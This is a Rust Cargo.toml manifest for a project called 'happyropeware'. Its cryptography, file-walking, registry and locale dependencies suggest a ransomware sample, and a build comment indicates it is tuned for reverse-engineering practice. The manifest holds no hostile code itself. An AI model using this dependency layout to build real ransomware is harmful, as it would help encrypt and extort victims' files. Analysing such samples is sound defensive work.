cargo-features = ["profile-rustflags"]

[package]
name = "happyropeware"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
winreg = "0.10.1"
anyhow = "1.0.68"
widestring = "1.0.2"
blake3 = "1.3.3"
directories = "4.0.1"
thiserror = "1.0.38"
zeroize = "1.5.7"
dryoc = "0.4.3"
uuid = "1.3.0"
single-instance = "0.3.3"
sys-locale = "0.2.3"
bs58 = "0.4.0"
salsa20 = { version = "0.10.2", features = ["zeroize"] }
walkdir = "2.3.2"
crossbeam-channel = "0.5.6"
skip_error = { version = "3.1.1", features = ["log"] }
log = { version = "0.4.17", features = ["release_max_level_off"] }
stderrlog = "0.5.4"
winapi = { version = "0.3.9", features = ["winreg"] }
user-idle = "0.5.2"

[dependencies.windows]
version = "0.43.0"
features = [
    "Win32_Foundation",
    "Win32_Storage_FileSystem",
    "Win32_UI_Shell",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_Memory",
    "Win32_System_WindowsProgramming",
    "Win32_Security_Cryptography",
    "Win32_System_SystemServices",
]

[build-dependencies]
embed-manifest = "1.3.1"

[profile.release]
# Make the code more friendly to reverse; nobody like reversing -O3 C++, so does Rust.
opt-level = 1
lto = true
rustflags = ["-Zremap-cwd-prefix=Z:\\", "-Clink-arg=/Brepro", "-Clink-arg=/pdbaltpath:PiDiBi.pdb"]
debug = true
